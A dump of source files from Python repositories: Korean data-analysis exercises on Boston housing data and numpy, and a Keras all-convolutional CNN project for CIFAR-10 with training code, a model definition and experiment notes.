apha:투명도\r\nplt.scatter(crim,medv,c = 200*crim,\r\n s =20 + 200*zn/zn.max(),\r\n alpha = 0.5) # 버블차트\r\n\r\nplt.grid(True)\r\nplt.xlabel('crim')\r\nplt.ylabel('medv')\r\nplt.title('1.2 Boston crim/zn medv scatter plot')\r\nplt.show()\r\n\r\n# 1.3 번\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nplt.plot(crim, np.polyval(poly, crim), label='Fit')\r\n\r\nmedv_start = int(medv.mean())\r\nprint(medv_start )\r\ny_ann = np.log(df.at[medv_start, 'MEDV']) - 0.1\r\nprint(y_ann)\r\nann_str = \"Medv Crime\\n %d\" % medv_start\r\nplt.annotate(ann_str, xy=(medv_start, y_ann),\r\n arrowprops=dict(arrowstyle=\"->\"),\r\n xytext=(-30, +70), textcoords='offset points')\r\n\r\ncnt_log = np.log(medv)\r\nplt.scatter(crim, cnt_log, c= 200 * crim,\r\n s=20 + 200 * zn/zn.max(),\r\n alpha=0.5, label=\"Scatter Plot\")\r\nplt.legend(loc='upper right')\r\nplt.grid()\r\nplt.xlabel(\"Crime\")\r\nplt.ylabel(\"Medv\", fontsize=16)\r\nplt.title(\"1.3 Boston Housing : Crime Medv\")\r\nplt.show()\r\n\r\n# 1.4번\r\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\r\n\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nX = df['CRIM'].values\r\n\r\nY = np.where(df['MEDV'].values>0, np.log(df['MEDV'].values), 0)\r\nX, Y = np.meshgrid(X, Y)\r\n\r\nZ = np.where(df['ZN'].values>0, np.log(df['ZN'].values), 0)\r\n# Z =Z.reshape(1,Z.shape[0])\r\nZ,_ =np.meshgrid(Z,0)\r\n\r\nax.plot_surface(X, Y, Z)\r\nax.set_xlabel('CRIME')\r\nax.set_ylabel('MEDV')\r\nax.set_zlabel('ZN')\r\nax.set_title(\"1.4 Boston Housing : Crime/ZN Medv\")\r\nplt.show()\r\n\r\n# 1.5번\r\nfrom pandas.plotting import lag_plot\r\n\r\nlag_plot(np.log(df['MEDV']))\r\nplt.title('1.5 Boston lag_plot')\r\nplt.show()\r\n\r\n# 1.6번\r\nfrom pandas.plotting import autocorrelation_plot\r\nautocorrelation_plot(np.log(df['MEDV']))\r\n\r\nplt.title('1.6 Boston autocorrelation_plot')\r\nplt.show()\r\n\r\n# 1.7번\r\n\r\ndf.plot.box()\r\nplt.title('1.7.1 Boston Box plot')\r\nplt.show()\r\n\r\ndf['TAX'].plot.box()\r\nplt.boxplot(df['TAX'],labels=['TAX'])\r\nplt.text(1, df['TAX'].median(), df['TAX'].median())\r\n\r\nplt.title('1.7.2 Boston TAX Box plot')\r\nplt.show()\r\n\r\nplt.boxplot(df['TAX'],labels=['TAX'])\r\nplt.text(1, df['TAX'].median(), df['TAX'].median())\r\nplt.title('1.7.3 Boston TAX Box plot')\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.2929813265800476,
"alphanum_fraction": 0.5183515548706055,
"avg_line_length": 20.478260040283203,
"blob_id": "2705d51721ae507bf873afe7ebc5eacbb7db967a",
"content_id": "97d4c9a53416013d4569fb3a3e15b71b6c5e4a70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1585,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 69,
"path": "/파이썬데이터분석/numpy활용실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# numpy활용실습문제.py\r\n\r\nimport numpy as np\r\n\r\n# 1번\r\n# 3*X0 + 2*X1 - 4*X2 = 52\r\n# 2*X0 - 4*X1 + 9*X2 = -27\r\n# 5*X0 + 3*X1 - 7*X2 = 86\r\n# X0 = 10\r\n# X1 = 5\r\n# X2 = -3\r\nA = np.mat(\"3 2 -4;2 -4 9;5 3 -7\")\r\nprint(\"A\\n\", A)\r\nb = np.array([52, -27, 86])\r\nprint(\"b\\n\", b)\r\n\r\nx = np.linalg.solve(A, b)\r\nprint(\"Solution : \", x) # [10. 5. -3.]\r\nprint('Check:',np.dot(A,x))\r\n\r\n# 역행렬로 답 구하기\r\ninverse = np.linalg.inv(A)\r\nx = np.dot(inverse,b)\r\nprint('using inverse:',x)\r\n\r\n\r\n\r\n\r\n\r\n\r\n# 2번\r\n\r\ndef mydot(a,b):\r\n r = np.arange(a.shape[0]*b.shape[1]).reshape(a.shape[0],\r\n b.shape[1])\r\n for i in range(a.shape[0]):\r\n for j in range(b.shape[1]):\r\n c = a[i, :] * b[:, j]\r\n r[i][j]= c.sum()\r\n return r\r\n\r\n\r\n# (m,n) * (n,l) = (m,l)\r\na = np.arange(6).reshape(2,3)\r\nb = np.arange(6).reshape(3,2)\r\nprint('\\na.dot(b):')\r\nprint(a.dot(b))\r\nprint('\\nmydot(a,b):')\r\nprint(mydot(a,b))\r\n# [[10 13]\r\n# [28 40]]\r\n\r\na = np.arange(24).reshape(4,6)\r\nb = np.arange(54).reshape(6,9)\r\nprint('\\na.dot(b):')\r\nprint(a.dot(b))\r\nprint('\\nmydot(a,b):')\r\nprint(mydot(a,b))\r\n# a.dot(b):\r\n# [[ 495 510 525 540 555 570 585 600 615]\r\n# [1305 1356 1407 1458 1509 1560 1611 1662 1713]\r\n# [2115 2202 2289 2376 2463 2550 2637 2724 2811]\r\n# [2925 3048 3171 3294 3417 3540 3663 3786 3909]]\r\n#\r\n# mydot(a,b):\r\n# [[ 495 510 525 540 555 570 585 600 615]\r\n# [1305 1356 1407 1458 1509 1560 1611 1662 1713]\r\n# [2115 2202 2289 2376 2463 2550 2637 2724 2811]\r\n# [2925 3048 3171 3294 3417 3540 3663 3786 3909]]\r\n\r\n"
},
{
"alpha_fraction": 0.5920398235321045,
"alphanum_fraction": 0.6965174078941345,
"avg_line_length": 9.526315689086914,
"blob_id": "6033b27a58187a833eb490890b04cc58f5ba8ddb",
"content_id": "8eb027b6ab5aeda8e6c2e0862183b1d8a928de09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 19,
"path": "/DACON_14회/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "\nMission 14. 금융문자 분석 경진대회\n\n기간 : 2019.11.21 ~ 2020.1.12\n\n\nhttps://dacon.io/cpt14\n\n\n\n\nkonlpy 설치: pip install konlpy\n\n\nMecab 설치\n\nhttps://cleancode-ws.tistory.com/97\n\n\nhttp://konlpy.org/en/latest/install/\n"
}
] | 21 |
ybenigot/all-convolutional-cnn-keras | https://github.com/ybenigot/all-convolutional-cnn-keras | 82be71e7b0abb4db3bf6921e07d375f5bcbbf862 | 650cdc7a24a8d47aef7f3e7342a3e5ecf3dccbbf | 440437ba43bce55412c7e2ff4fdb74fb8e49f0fd | refs/heads/master | 2021-01-18T14:53:46.182049 | 2016-09-19T18:58:43 | 2016-09-19T18:58:43 | 68,439,539 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6694989204406738,
"alphanum_fraction": 0.687117338180542,
"avg_line_length": 32.19916915893555,
"blob_id": "5f031dc71666283005a5d78a7cde8281981880b6",
"content_id": "7337c89734a0d1038fa24740410408aa8eceb795",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8003,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 241,
"path": "/convnet3.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "# adapted from keras examples\nfrom keras.optimizers import SGD, Nadam\nfrom keras.datasets import cifar10\nfrom keras.utils.np_utils import to_categorical\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.regularizers import l2, activity_l2\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\n\nfrom trace import TraceWeights\n\nimport numpy as np\nimport sys\nimport imageutils as im\nimport time\nimport cifar10labels as cl\nimport random as rn\nimport datetime as dt\nimport os\nimport plot as pl\nimport modelallcnn as mo\n\nfrom sklearn.utils import shuffle # used for shuffling batch of samples\n\n############### Parameters ################\nimage_size=32\nimage_border=16\ninput_size=image_size+2*image_border\nbatch_size_param=32\nlearn_rate=0.0003\n#decay_param=4e-5 # 1 - 0.1**(1/(100*45000/256))) \ntraining_set_ratio=0.9\ntranslation_augmentation=0.2\nflip_augmentation=True\n\nclass PreProcessor:\n\n\t@staticmethod\n\tdef load_datasets():\n\t\t''' load and normalize data from dataset files '''\n\t\t(X, y), (X_test, y_test) = cifar10.load_data()\n\t\tn = X.shape[0]\n\t\tn1 = int(n * training_set_ratio)\n\t\tn2 = n-n1\n\t\t#randomize dataset split\n\t\tindex_val = rn.sample(range(n), n2)\n\t\tX_val = X[index_val,:]\n\t\ty_val = y[index_val]\n\t\tindex_train=[i for i in range(n) if i not in index_val]\t\t\n\t\tX_train=X[index_train,:]\n\t\ty_train=y[index_train]\n\t\treturn X_train, y_train, X_val, y_val, X_test, y_test\n\n\t@staticmethod\n\tdef compute_average(data):\n\t\t''' compute mean per color channel for all data '''\n\t\tm = np.zeros(data.shape[1])\n\t\tfor j in range(0,data.shape[1]):\n\t\t\tm[j] = np.mean(data[:,j,:])\n\t\treturn m\n\n\t@staticmethod\n\tdef scale_data(data,avg_per_channel):\n\t\t''' scale the image pixel values into interval 0,2, mean will be substrated later '''\n\t\tscale=128\n\t\tn=data.shape[0]\n\t\tdata = data.astype('float32')\n\t\tdata = data.reshape((n,3,image_size,image_size))\n\t\tif input_size>image_size:\n\t\t\t# extend image size with zeroes\n\t\t\tdata2 = np.zeros((n,3,input_size,input_size),dtype=np.float32)\n\t\t\tfor i in range(0,n):\n\t\t\t\tfor j in range(0,3):\n\t\t\t\t\t#substract mean, per sample and per color channel \n\t\t\t\t\tdata2[i,j,image_border:image_size+image_border,image_border:image_size+image_border] =\\\n\t\t\t\t\t\tdata[i,j,:,:] - avg_per_channel[j]\n\t\t\tdata2 /= scale\n\t\t\treturn data2\t\n\t\telse:\n\t\t\tdata /= scale\n\t\t\treturn data\n\n\t@staticmethod\n\tdef augment(X):\n\t\t''' compute pseudo-random translation, flip etc of X data to augment the dataset inputs '''\n\t\t''' pseudo-random augmentation means that multiple augmenation on the same data will yield the same result '''\n\t\tn=X.shape[0]\n\t\trn.seed(a=1, version=2)\n\t\tmax_translation=int(image_size*translation_augmentation)\n\t\tX2=np.zeros(X.shape)\n\t\tx_max=X.shape[2]\n\t\ty_max=X.shape[3]\n\t\tx_range=range(0,x_max)\n\t\ty_range=range(0,y_max)\n\t\t# loop on sample, channel, x coord, y coord\n\t\tfor i in range(0,n):\n\t\t\tflip=bool(rn.randrange(0,1,1))\n\t\t\tx_translation=rn.randrange(0, max_translation,1)\n\t\t\ty_translation=rn.randrange(0, max_translation,1)\n\t\t\tfor k in x_range:\n\t\t\t\tfor l in y_range:\n\t\t\t\t\tif k+x_translation in x_range and l+y_translation in y_range:\n\t\t\t\t\t\tif flip:\n\t\t\t\t\t\t\tfor j in range(0,3): # same augmentation translation/flip for all channels\n\t\t\t\t\t\t\t\tX2[i,j,x_max-k,y_max-l]=image=X[i,j,k+x_translation,l+y_translation]\n\t\t\t\t\t\telse 
:\n\t\t\t\t\t\t\tfor j in range(0,3):\n\t\t\t\t\t\t\t\tX2[i,j,k,l]=image=X[i,j,k+x_translation,l+y_translation]\n\t\treturn X2\n\n\tdef process_data_batch(self,X,y,avg_per_channel):\n\t\t''' preprocess a batch of data in memory, same algorithm for train, validation, and test data '''\n\t\t''' note : the same batch of data is \"re augmented\" again for each pass '''\n\n\t\tX=self.scale_data(X,avg_per_channel)\n\t\tX=self.augment(X)\n\t\ty = to_categorical(y,10)\n\t\treturn X,y\n\nclass Engine:\n\n\tX_batch_current=0\n\ty_batch_current=0\n\n\tdef __init__(self,preprocessor):\n\t\tself.preprocessor = preprocessor\n\n\tdef dataGenerator(self,X,y,batch_size,avg_per_channel):\n\t\t''' a python 3 generator for producing batches of data '''\n\t\tprint(\"new generator for %s \\n\" % (X.shape,) )\n\t\twhile(True):\n\t\t\tN=int(X.shape[0]/batch_size)\n\t\t\tfor i in range(N):\n\t\t\t\tX_batch = X[i*batch_size:(i+1)*batch_size,:,:,:]\n\t\t\t\ty_batch = y[i*batch_size:(i+1)*batch_size]\n\t\t\t\tself.X_batch_current,self.y_batch_current = self.preprocessor.process_data_batch(X_batch, y_batch, avg_per_channel)\n\t\t\t\t#print(i,'X_.shape ',X2.shape,'y.shape ',y2.shape,' y ',y2)\n\t\t\t\tyield self.X_batch_current,self.y_batch_current\n\t\t\t# random shuffle the data set after each batch to immprove learning\n\t\t\tprint(\"shuffle X,y\")\n\t\t\tX,y=shuffle(X,y)\n\n\tdef fit(self,model , X_train, y_train, X_val, y_val, epochs,avg_per_channel):\n\t\t''' train the model '''\n\t\tearlyStopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='auto')\n\t\tcheckpointer = ModelCheckpoint(filepath=\"record/weights.{epoch:02d}-{val_loss:.2f}.hdf\", verbose=1, save_best_only=True)\n\t\ttraceWeightsTrain=TraceWeights(1,self)\n\t\tg_train=self.dataGenerator(X_train, y_train, batch_size=batch_size_param,avg_per_channel=avg_per_channel)\n\t\tg_valid=self.dataGenerator(X_val, y_val, batch_size=batch_size_param,avg_per_channel=avg_per_channel)\n\t\thistory=model.fit_generator(g_train,callbacks=[checkpointer,\\\n\t\t\t#earlyStopping,\\\n\t\t\t#traceWeightsTrain\\\n\t\t\t],\\\n\t\t\tsamples_per_epoch=len(X_train),nb_epoch=epochs,verbose=1,validation_data=g_valid,nb_val_samples=y_val.shape[0])\n\t\treturn history\n\n\t@staticmethod\n\tdef predict(model,X,y):\n\t\t''' predict Y given X using model '''\n\t\tpred = model.predict(X, batch_size=batch_size_param, verbose=0)\n\t\t#g.fit(X)\n\t\t#pred = model.predict_generator(g.flow(X, y, batch_size=512), X.shape[0])\n\t\treturn pred\n\n\t@staticmethod\n\tdef compute_accuracy(pred,Y):\n\t\t'''compute prediction accuracy by matching pred and Y'''\n\t\tcomparison = np.argmax(pred,1)==np.argmax(Y,1)\n\t\taccuracy = sum(comparison)/pred.shape[0]\n\t\treturn accuracy\n\n\ndef show_results(pred,X,Y):\n\tclassification=np.argmax(pred,1)\t\n\tfor i in rn.sample(range(X.shape[0]), 1):\n\t\tim.display_normalized_image(X[i,:],input_size)\n\t\tprint('prediction:',cl.labels[classification[i]],'actual value:',cl.labels[np.argmax(Y[i])])\n\t\ttime.sleep(5)\n\ndef main():\n\n\tepochs=int(sys.argv[1])\n\tprint(epochs,' epochs')\n\n\ttry:\n\t\treload_model=sys.argv[3]\n\texcept:\n\t\treload_model=\"NO\"\n\n\n\tpreprocessor = PreProcessor()\n\tengine = Engine(preprocessor)\n\n\tX_train, y_train, X_val, y_val, X_test, y_test = preprocessor.load_datasets()\n\n\tavg_per_channel=preprocessor.compute_average(X_train)\n\n\tX_batch = X_train[0:batch_size_param,:,:,:]\n\ty_batch = y_train[0:batch_size_param]\n\t#X1,y1 = preprocessor.process_data_batch(X_batch,y_batch,avg_per_channel)\n\t# for 
i in range(0,3):\n\t# \tim.display_normalized_image(X1[i,:],input_size,avg_per_channel)\n\t# \tim.display_image(X_batch[i,:],image_size)\n\n\tprint('X_train.shape ',X_train.shape,'y_train.shape ',y_train.shape)\n\tprint('X_val.shape ', X_val.shape, 'y_val.shape ', y_val.shape)\n\tprint('X_test.shape ', X_test.shape, 'y_test.shape ', y_test.shape)\n\n\t# prepare the model\n\tmodel = mo.make_model(input_size)\n\t#opt = SGD(lr=learn_rate, decay=decay_param, momentum=0.9, nesterov=True)\n\topt = Nadam(lr=learn_rate)#,clipvalue=100)\n\tmodel.compile(loss='categorical_crossentropy', optimizer=opt,metrics=[\"accuracy\"])\n\n\tif reload_model != \"NO\":\n\t\tprint('load model weights:',reload_model)\n\t\tmodel.load_weights(reload_model)\n\n\tprint('model parameters:',model.count_params())\n\tprint('model characteristics:',model.summary())\n\tprint('----------------------------------------------------------------------------------------')\n\n\thist=engine.fit(model , X_train, y_train, X_val, y_val, epochs,avg_per_channel)\n\tprint(hist.history)\n\n\t# test the model\n\tpred = engine.predict(model,X_test,y_test)\n\taccuracy=engine.compute_accuracy(pred,y_test)\n\tprint('accuracy on test data: ',accuracy*100, '%')\n\tshow_results(pred,X_test,y_test)\n\n\t# save learned weights\n\tf=\"%d-%m-%y\"\n\tfilename='record/weights-'+dt.date.today().strftime(f)\n\tmodel.save_weights(filename,overwrite=True)\n\n\tpl.plot(hist.history,len(hist.history['acc']))\n\tos.system('./plot.sh')\n\n\nif __name__ == \"__main__\":\n main()\n\n\n"
},
{
"alpha_fraction": 0.7660427689552307,
"alphanum_fraction": 0.7874331474304199,
"avg_line_length": 40.5,
"blob_id": "d550f1bf3a8935b3b423cadc0fdf9e114d3bf388",
"content_id": "16fe30675ceb660f4fed9960458d6d9be42ae24b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 748,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 18,
"path": "/README.md",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "this an all convolutional CNN using the cirfar10 dataset\nas of 17092016 performance, without regularization is : accuracy 92% validation 82% (so, overfitting)\n\nthe files are :\n- convnet3.py runs the keras model, started by learn.sh\n- modelallcnn.py the keras model\n- trace.py a keras callback for tracing activation values in case of NaN\n- imageutils.py image utilities\n- plot.py plot accuracy during training (used by plot.sh)\n- plot.sh plot accuracy\n- learn.sh start training, an optional first argument would be a saved weight files for restarting training from a saved point in time\n\nmodification log :\n- shuffle batch samples using skleanr shuffle()\n- set a small lambda for L2 regularization\n\nfuture modifications :\n- recheck input dataset\n\n"
},
{
"alpha_fraction": 0.575419008731842,
"alphanum_fraction": 0.5810055732727051,
"avg_line_length": 28.66666603088379,
"blob_id": "6ba5b27b2de52e4ff1bbd0c5f8a5fc8480881815",
"content_id": "4631d8fcc779d3f029a589dc2367a82284d0e836",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 6,
"path": "/plot.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "\ndef plot(history,size):\n\tf=open('plot.data','w')\n\tfor i in range(0,size):\n\t\tline=str(i)+' '+str(history['acc'][i])+' '+str(history['val_acc'][i])+'\\n'\n\t\tf.write(line)\n\tf.close()\n"
},
{
"alpha_fraction": 0.36090224981307983,
"alphanum_fraction": 0.4060150384902954,
"avg_line_length": 19.461538314819336,
"blob_id": "7e2c2a1167cf7277cbed873648f410cb5e5ed190",
"content_id": "4d08fb457f36dc69b269a0fb8f401eab00300194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/cifar10labels.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "\n'''CIFAR 10 labels recorded here from their homepage'''\n\nlabels={\n0:'airplane',\t\t\t\t\t\t\t\t\t\t\n1:'automobile',\t\t\t\t\t\t\t\t\t\t\n2:'bird',\t\t\t\t\t\t\t\t\t\t\n3:'cat',\t\t\t\t\t\t\t\t\t\t\n4:'deer',\t\t\t\t\t\t\t\t\t\t\n5:'dog',\t\t\t\t\t\t\t\t\t\t\n6:'frog',\t\t\t\t\t\t\t\t\t\t\n7:'horse',\t\t\t\t\t\t\t\t\t\t\n8:'ship',\t\t\t\t\t\t\t\t\t\t\n9:'truck'}"
},
{
"alpha_fraction": 0.5049889087677002,
"alphanum_fraction": 0.6583518385887146,
"avg_line_length": 31.39521026611328,
"blob_id": "fd058c57fd20b5134ab8e9f138410fd8b9c4c572",
"content_id": "2c80381def83aec3d07d0dba6a59c5624bf73227",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 5414,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 167,
"path": "/notes.txt",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "todo :\n- reduce learning rate\n- NanGuardMode\n- close opened images use ion()\n- data augmentation : tra\tnslation, then affine (rotation, distortion) by keras\n\n\nmean of all pixels is slightly dependant of color, as well as std dev\n- substract mean per sample per color\n- do not correct variance\n- apply pca whitening\n- if using pca goal is to retain 99% variance (probably not applicable here)\n-> next understand numpy eigenvectors\n\nmean+variance per sample :\nEpoch 56/100\n45000/45000 [==============================] - 152s - loss: 0.6540 - acc: 0.7718 - val_loss: 0.7994 - val_acc: 0.7390\nEpoch 57/100\n45000/45000 [==============================] - 152s - loss: 0.6495 - acc: 0.7738 - val_loss: 0.7852 - val_acc: 0.7456\nEpoch 58/100\n45000/45000 [==============================] - 152s - loss: 0.6392 - acc: 0.7766 - val_loss: 0.7757 - val_acc: 0.7462\nEpoch 59/100\n45000/45000 [==============================] - 152s - loss: 0.6341 - acc: 0.7796 - val_loss: 0.7790 - val_acc: 0.7384\nEpoch 60/100\n45000/45000 [==============================] - 152s - loss: 0.6269 - acc: 0.7821 - val_loss: 0.7757 - val_acc: 0.7376\nEpoch 61/100\n45000/45000 [==============================] - 152s - loss: 0.6244 - acc: 0.7807 - val_loss: 0.7637 - val_acc: 0.7498\nEpoch 62/100\n45000/45000 [==============================] - 155s - loss: 0.6176 - acc: 0.7823 - val_loss: 0.7597 - val_acc: 0.7464\n\n76%\n\nnumpy PCA : sigma = x.dot(x.T) uses too much memory\n\ninit he_normal\nEpoch 1/1\n45000/45000 [==============================] - 476s - loss: 1.7333 - acc: 0.3760 - val_loss: 1.5369 - val_acc: 0.4894\naccuracy on test data: 48.3 %\nprediction: truck actual value: truck\n>>> \nYvess-MacBook-Pro:keras yves$ python\n\nretest without leaky relu : 0.3 -> 0.0.3 worse\ntune dropout according to 2014 article\naugmentation\nmore maps\nmax_norm value 3 or 4\n\n128 maps base\nbatch 128\nlambda 0.03\n100 epochs\ndropout 0.1 02 0.3 0.4\nepoch 38 90% 80% overfit\nepoch 96 95% 80% overfit\nepoch 100 97,5% 80% overfit\n\nset dropout to 0.5 0.5 0.5 0.5\nepoch 16 both at 15%\n\nset dropout to 0.3 0.3 0.3 0.3\nsame as 0.1 0.2 0.3 0.4 95% 78% at epoch 72\n\nset dropout 0.4 0.4 0.4 0.4 0.4\ntest: 76.4% fit 90.5%\n\nregularization L2 54% on test data on 50 batches 67% on train\n\nlooking at VGG on ILSVRC 2014\n- no leaky relu\n- L2 multiplier = 0.0005, dropout on first two FC layers, learning rate 0.01\n- size of maps multiplied by 2 each convolution\n- convolution layer padding 1 -> border same\n\n97,5% 82% 50 epoch\n\nadd little L2\n\nacc train 99% test 80%\n\nnext : try convnet, introduce generator for augmentation (compute validation data first)\nsmaller FC ?\naugmentation set for training, not yer for testing\n\n45000/45000 [==============================] - 252s - loss: 1.6781 - acc: 0.8650 - val_loss: 0.4319 - val_acc: 0.8520\nEpoch 50/50\n45000/45000 [==============================] - 252s - loss: 1.6670 - acc: 0.8634 - val_loss: 0.4311 - val_acc: 0.8474Using Theano backend.\nUsing gpu device 0: GeForce GT 730 (CNMeM is disabled, cuDNN 5004)\n\naccuracy on test data: 83.99 %\n\n16/06 : batches 100, augmentation translation 0.2, rotation none, test : 86.6 % , train : 88.16%\n\noptions :\n- rotation augmentation\n- batch normalization -> is key because we could avoid dropout and use sigmoids\n- additional convnet layer \n\nwith rotation, results are slightly better (dropout=0 0 0 0 0.5 0)\n45000/45000 [==============================] - 274s - loss: 1.3343 - acc: 0.8274 - val_loss: 0.4096 - val_acc: 
0.8576\naccuracy on test data: 85.17 %\n\nwith batch normalization:\n45000/45000 [==============================] - 1357s - loss: 0.7389 - acc: 0.8576 - val_loss: 0.3976 - val_acc: 0.8644\nEpoch 45/100\n\nEpoch 55/100\n44800/45000 [============================>.] - ETA: 2s - loss: 0.7926 - acc: 0.8334Epoch 00054: early stopping\n45000/45000 [==============================] - 640s - loss: 0.7927 - acc: 0.8334 - val_loss: 0.4275 - val_acc: 0.8516Using Theano backend.\nUsing gpu device 0: GeForce GT 730 (CNMeM is disabled, cuDNN 5004)\n85%\n\n-----------------\nZeroPadding2D\none conv layer removed\ndropout, no batch normalization\n10 epoch 66%\n\n82.%\n\n-- rollback to 1606\nreinstate early stopping\n\n128 maps base\n88.% test accuracy after 100 epochs, best result so far, save as convnet.py 26062016\n\nuse network input size larger than image ?\nuse fmp ?\nThe learning rate γ was adapted using a schedule S = e1 , e2 , e3 in which γ is multiplied by a fixed multiplier of 0.1 after e1.e2 and e3 epochs respectively.\n\ntodo : implement numpy.append to limit memory usage\nnext : try all convnet\nintroduire l augmentation sur le test set\n\n88% 05072016\n87.9% 070072016\n\ndebug modelallcnn (flatten)\ncommit convnet.py on github\n\nzca?\nlearning_rate ?\nbatch normalization ?\n\naccuracy on test data: 87.27 %\n16072016\n\nalso there is now a memory overflow on the GPU, maybe activate memory management by Ubuntu\nmust improve structure : display_normalized_image inverses scale\n\ntry to output a statistic of layer weights per layer to trace computation errors\n\nTRY GRADIENT CLIPPING\ntry keras stride instead of subsampling\n---\neven with gradient clipping, first batch\n\nwhen early stopping, there is an error on the number of elements in history\n\nEpoch 200/200\n======] - 1003s - loss: 0.2308 - acc: 0.9191 - val_loss: 0.6928 - val_acc: 0.8223\noverfit : accuracy 92% validation 82% with lamba=0\n\nset GPU at max speed by default\n\n17/092016\nloss: 0.3317 - acc: 0.9011 - val_loss: 0.4386 - val_acc: 0.8664\n\n\n"
},
{
"alpha_fraction": 0.7245227694511414,
"alphanum_fraction": 0.7553597688674927,
"avg_line_length": 49.07352828979492,
"blob_id": "c1ea7082e936f57f99edbca497a2d1001c348193",
"content_id": "7e71b1b68612e6baa55fd535d1ee4c83d0f0fdb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3405,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 68,
"path": "/modelallcnn.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "# adapted from keras examples\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Reshape\nfrom keras.layers import Convolution2D, MaxPooling2D, AveragePooling2D\nfrom keras.optimizers import SGD\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.regularizers import l2, activity_l2\nfrom keras.layers.advanced_activations import LeakyReLU\n\ndef make_model(input_size):\n\n\tmaps_count_param=24 # a higher value like 96 ends up with a Nan loss on GPU\n\tlambda_param=0.00001 # a very low value since we have so much parameters\n\talpha_param=0.3\n\n\t''' define the model'''\n\tmodel = Sequential()\n\n\tmodel.add(Convolution2D(maps_count_param, 3, 3, border_mode='same', input_shape=(3, input_size, input_size),init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.1))\n\tmodel.add(Convolution2D(maps_count_param, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.2))\n\t#model.add(BatchNormalization(mode=1))\n\n\tmodel.add(Convolution2D(maps_count_param*2, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*2, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*2, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.3))\n\t#model.add(BatchNormalization(mode=1))\n\n\tmodel.add(Convolution2D(maps_count_param*3, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*3, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*3, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.4))\n\t#model.add(BatchNormalization(mode=1))\n\n\tmodel.add(Convolution2D(maps_count_param*4, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*4, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*4, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.5))\n\t#model.add(BatchNormalization(mode=1))\t\n\n\t#print('model characteristics:',model.summary())\n\n\tmodel.add(Flatten())\n\n\tmodel.add(Dense(maps_count_param*16, 